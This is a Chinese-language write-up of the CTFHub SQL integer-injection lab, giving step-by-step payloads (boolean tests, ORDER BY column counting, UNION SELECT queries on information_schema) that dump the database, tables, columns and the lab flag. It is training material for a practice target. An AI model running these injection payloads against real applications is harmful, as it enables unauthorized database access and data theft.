CTFHUB技能树之SQL——整数型注入

开启靶场,打开链接:

直接指明是SQL整数型注入,但还是来判断一下


(1)检查是否存在注入点

1 and 1=1#

返回正确

1 and 1=2#

返回错误

说明存在SQL整数型注入


(2)猜字段数

1 order by 2#

1 order by 3#

说明字段数是2


(3)爆数据库名

1 and 1=2 union select 1,database()#

得知数据库名是sqli


(4)爆表名

1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表,其中flag表是我们需要的


(5)爆列名

1 and 1=2 union select 1,column_name from information_schema.columns where table_schema='sqli' and table_name='flag'#

得知flag表的列名是flag


(6)爆字段内容(flag)

1 and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功的得到flag:

ctfhub{0bdb6d621fc76a06fde34a00}

这里用sqlmap也是可以的,但我提前交了就不想再费时间重开一遍靶场了,待会就在"字符型注入"中试试了

相关推荐
laplace012310 分钟前
Part 5|LangChain Agent 部署与上线流程(LangGraph 生态)
笔记·python·学习·语言模型·langchain
Dxy123931021611 分钟前
Python MySQL 错误回滚实战代码
数据库·python·mysql
数据轨迹00122 分钟前
从频域视角重构空洞卷机
经验分享·笔记·facebook·oneapi·twitter
Go高并发架构_王工24 分钟前
Redis未来展望:Redis 7.0新特性与技术发展趋势
数据库·redis·缓存
雪碧聊技术32 分钟前
博客摘录「 在SpringBoot项目中,使用单元测试@Test」2025年7月10日
笔记
产幻少年1 小时前
用户登录日志表和系统日志
运维·服务器·数据库
之歆1 小时前
Spring AI Alibaba 从入门到进阶实战-笔记
人工智能·笔记·spring
·云扬·1 小时前
InnoDB Cluster高可用测试实战:主从切换与故障恢复验证
数据库·mysql
laplace01231 小时前
LangChain 1.0 入门实战 · Part 6:LangChain Agent 中间件(Middleware)入门介绍
笔记·python·中间件·langchain·numpy·pandas
悠哉悠哉愿意1 小时前
【嵌入式学习笔记】UART
笔记·单片机·嵌入式硬件·学习